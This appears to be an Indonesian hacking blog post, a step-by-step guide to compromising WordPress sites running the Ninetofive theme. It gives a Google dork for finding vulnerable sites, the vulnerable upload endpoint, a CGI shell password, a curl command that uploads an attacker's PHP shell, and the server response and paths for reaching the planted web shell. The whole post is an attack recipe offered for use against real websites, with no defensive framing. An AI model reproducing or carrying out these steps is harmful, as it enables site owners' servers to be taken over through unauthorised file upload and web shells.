Assalamualaikum wr wb :D apa kabar semua ? baik baik aja kan ? kalo ane sih Alhamdulillah baik :D kali ini ane mau share WordPress Theme Ninetofive Remote Exploit :D ok langsung saja disimak bre ;)
Bahan Bahan :
- CGI Shell ( Download here )
Langkah - Langkah :
1. Pertama kita cari dulu web vuln nya di google, masukin dork berikut :
"inurl:/wp-content/themes/ninetofive" ( Di kembangin lagi :D )
2. Lalu pilih salah satu web, dan masukin exploit berikut ini :
"/wp-content/themes/ninetofive/scripts/doajaxfileupload.php"
3. Jika vuln akan muncul bacaan seperti gambar dibawah ini :
4. Setelah itu kita buka CGI Shell nya, tapi sebelumnya upload dulu CGI Shell nya ke web
5. Lalu klik CGI Shell ( liat di atas gambar )
6. Setelah di klik, masukin password nya, password nya adalah webr00t
7. Jika sudah login, klik bacaan 'Upload File'
8. Lalu upload shell kalian
9. Setelah diupload, tinggal kita eksekusi :D masukin perintah berikut dan Tekan enter :D
curl -v -F "qqfile=@namashellkalian.php" "http://localhost/wp-content/themes/ninetofive/scripts/doajaxfileupload.php"
10. Jika berhasil akan seperti gambar dibawah ini :
11. Set-Cookie:
PixelAttached_1=%2Fhome%2Fsciencef%2Fpublic_html%2Flocalhost%2Fwp-content%2Fuploads%2F2015%2F03%2Fjoms_551a89b87c7d7.php;
expires=Tue, 31-Mar-2015 12:49:12
joms_551a89b87c7d7.php < ini adalah shell kita :D, tinggal di akses deh :D
* Kadang nama shell kita berubah jadi random, contoh : 11das871kls61kja679a5651gay.php
Tempat akses shell : http://localhost/wp-content/uploads/tahun/bulan/shell.php
http://localhost/wp-content/themes/ninetofive/scripts/uploads/shell.php
OK sekian dan salam Ganteng :D Wassalamualaikum wr wb :D
WordPress Theme Ninetofive Remote Exploit
Diberdayakan oleh Blogger.
Catatan Kecil Bona
BalasHapusMudah Tekno